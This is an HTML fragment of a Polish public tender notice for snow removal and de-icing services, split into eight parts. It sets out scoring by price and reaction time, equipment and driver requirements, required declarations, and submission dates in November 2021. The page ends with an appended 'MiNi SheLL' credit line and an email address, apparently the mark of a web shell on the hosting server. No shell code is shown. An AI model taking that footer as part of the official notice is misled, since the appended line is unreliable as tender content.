class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował kryterium:<br/>1) Wartość brutto– znaczenie 60%;<br/>2) Czas reakcji -znaczenie 40%.<br/>Cena całkowita brutto [zł]<br/>Liczba punktów = (Cmin x 100 x waga) / Cof<br/>gdzie:<br/>- Cmin – najniższa cena spośród wszystkich ofert<br/>- Cof – cena badanej oferty<br/>Czas reakcji [h]<br/>Wykonawca zobowiązany będzie wskazać czas w jakim przystąpi do rozpoczęcia odśnieżania i<br/>usuwania śliskości zimowej, liczony od momentu otrzymania zlecenia wyjazdu od Koordynatora,<br/>przyznawanie punktów poszczególnym ofertom w/w kryterium odbywać się będzie wg następującej<br/>zasady:<br/>w ciągu 1 godziny zegarowej- uzyska 40pkt;<br/>w ciągu 1,5 godziny zegarowej- uzyska 30pkt;<br/>w ciągu 2 godzin zegarowych- uzyska 20pkt;<br/>w ciągu 2,5 godzin zegarowych- uzyska 10pkt;<br/>w ciągu 3 godzin zegarowych- uzyska 0pkt;<br/>Wykonawca może uzyskać maksymalnie 40 pkt, kryterium będzie oceniane na podstawie<br/>oświadczenia złożonego w treści Formularza ofertowego w ramach każdego zadania oddzielnie.<br/>Wykonawca obowiązkowo musi wskazać tylko jeden przedział każdorazowego rozpoczęcia realizacji<br/>przedmiotu zamówienia:<br/>a) Oferta Wykonawcy, który wskaże czas w jakim przystąpi do rozpoczęcia odśnieżania i usuwania<br/>śliskości zimowej, liczony od momentu otrzymania zlecenia wyjazdu od Koordynatora, poniżej 1<br/>godziny zegarowej jego oferta zostanie odrzucona, jako oferta niezgodna z warunkami zamówienia w<br/>ramach zadania na które zaoferował omawiany czas reakcji.<br/>b) Oferta Wykonawcy, który wskaże czas w jakim przystąpi do rozpoczęcia odśnieżania i usuwania<br/>śliskości zimowej, liczony od momentu otrzymania zlecenia wyjazdu od Koordynatora, powyżej 3<br/>godzin zegarowych jego oferta zostanie odrzucona, jako oferta niezgodna z warunkami zamówienia w<br/>ramach zadania na które zaoferował omawiany czas reakcji.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykonawca musi wykazać, że posiada sprzęt, przeznaczony przez Wykonawcę do realizacji<br/>zamówienia publicznego.<br/>Wykonawca przygotuje wykaz sprzętu dotyczący danej części zamówienia, na którą składa<br/>ofertę.<br/>Część 1<br/>-Nośnik z pługiem –min. 1szt<br/>Część 2<br/>-Nośnik z pługiem –min. 1szt<br/>Część 3<br/>-Nośnik z pługiem –min. 1szt<br/>Część 4<br/>-Nośnik z pługiem –min. 1szt<br/>Część 5<br/>-Nośnik z pługiem –min. 1szt<br/>Część 6<br/>-Nośnik z pługiem –min. 1szt<br/>Część 7<br/>-Nośnik z solarką (sól) –min. 1szt<br/>Część 8<br/>-Nośnik z solarką (sól) –min. 1szt<br/>Wykonawca musi dysponować osobami zdolnymi do wykonywania zamówienia, które posiadają<br/>kwalifikacje oraz uprawnienia (odpowiednie do obsługiwanego pojazdu kategorie prawa jazdy)<br/>wymagane przepisami prawa jazdy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została<br/>najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania,<br/>podmiotowych środków dowodowych, aktualnych na dzień złożenia: W celu potwierdzenia braku<br/>podstaw wykluczenia wykonawcy z udziału w postępowaniu:1) odpis lub informacja z Krajowego<br/>Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art.<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli<br/>odrębne przepisy wymagają wpisu do rejestru lub ewidencji;2) oświadczenia wykonawcy, w zakresie<br/>art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu<br/>ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i<br/>1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie<br/>do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej<br/>grupy kapitałowej;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W zakresie potwierdzenia spełnienia warunków udziału w postępowaniu:<br/>1) wykaz osób- skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami, wraz<br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami– zakresie niezbędnym do<br/>wykazania spełnienia warunku udziału w postępowaniu (załącznik nr 5 do SWZ);<br/>2) wykaz sprzętu – przeznaczonego przez Wykonawcę do realizacji zamówienia publicznego- wykazu<br/>narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania<br/>zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami – w zakresie<br/>niezbędnym do wykazania spełnienia warunku udziału w postępowaniu (załącznik nr 6 do SWZ);</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Formularz ofertowy sporządzony zgodnie ze wzorem stanowiącym załącznik nr 1 do SWZ w<br/>formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym.<br/>2) Oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków udziału w<br/>postępowaniu na podstawie art. 125 ust. 1 w zakresie wskazanym w pkt 8.2, 9.2 i 9.3 SWZ.<br/>Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w postępowaniu, na dzień składania ofert, tymczasowo zastępujący<br/>wymagane podmiotowe środki dowodowe, wskazane w pkt 12 SWZ.<br/>Oświadczenie składają odrębnie: a) wykonawca/każdy spośród wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia. W takim przypadku oświadczenie potwierdza brak<br/>podstaw wykluczenia wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie,<br/>w jakim każdy z wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu; b) podmiot udostępniający zasoby, na którego potencjał<br/>powołuje się Wykonawca celem potwierdzenia spełnienia warunków udziału w postępowaniu. W<br/>takim przypadku oświadczenie potwierdza brak podstaw wykluczenia podmiotu oraz spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim podmiot udostępnia swoje zasoby<br/>Wykonawcy.<br/>Wymagana forma – pod rygorem nieważności, w formie elektronicznej lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>3) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej lub innego właściwego rejestru potwierdzającego, że osoba<br/>działająca w imieniu wykonawcy jest<br/>umocowana do jego reprezentowania.<br/>4) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>Wykonawcy, gdy umocowanie osoby składającej ofertę nie wynika z dokumentów opisanych w<br/>pkt.11.3 SWZ<br/>5) w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) pełnomocnictwo, w przypadku wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, z treści którego będzie wynikało umocowanie do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania w postepowaniu i zawarcia<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>umowy w sprawie zamówienia publicznego.<br/>b) oświadczenie, o którym mowa w pkt 6.4 SWZ na podstawie art.117 ust.1 pkt.4 ustawy Pzp,;<br/>6) zobowiązanie o którym mowa w pkt 7.3 oraz 7.4 SWZ. (jeżeli dotyczy) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.1 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia Umowy. Umocowanie musi wynikać z treści pełnomocnictwa przedłożonego wraz z ofertą.<br/>1.2 Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej (o ile został sformułowany), o którym mowa w art. 112 ust. 2 pkt 2 ustawy Pzp, zostanie spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, do których realizacji te uprawnienia<br/>są wymagane.<br/>1.3 W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia (o ile zostały sformułowane) wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty do realizacji których te zdolności są wymagane.<br/>1.4 W przypadku, o którym mowa w pkt 6.2 i 6.3, na podstawie art.117 ust.1 pkt.4, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy (załącznik nr 8 do SWZ).<br/>1.5 Pełnomocnictwo powinno jednoznacznie określać postępowanie, do którego się odnosi i precyzować zakres umocowania. Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>1.6 W przypadku wykonawców wspólnie ubiegających się o zamówienie, których oferta zostanie uznana za najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, są zobowiązani do zawarcia umowy cywilnoprawnej określającą rolę i zadania poszczególnych Wykonawców oraz zasady ich współdziałania podczas realizacji zamówienia. Zamawiający<br/>może żądać przedstawienia wyżej wskazanej umowy.<br/>1.7 Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmian postanowień umowy na podstawie art. 455 ust.1 pkt 2-4 oraz ust. 2-4 ustawy Pzp. Szczegółowe zasady wprowadzania zmian określne zostały w Projektowanych Postanowieniach Umowy stanowiących załącznik do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/ujazd</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-15 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com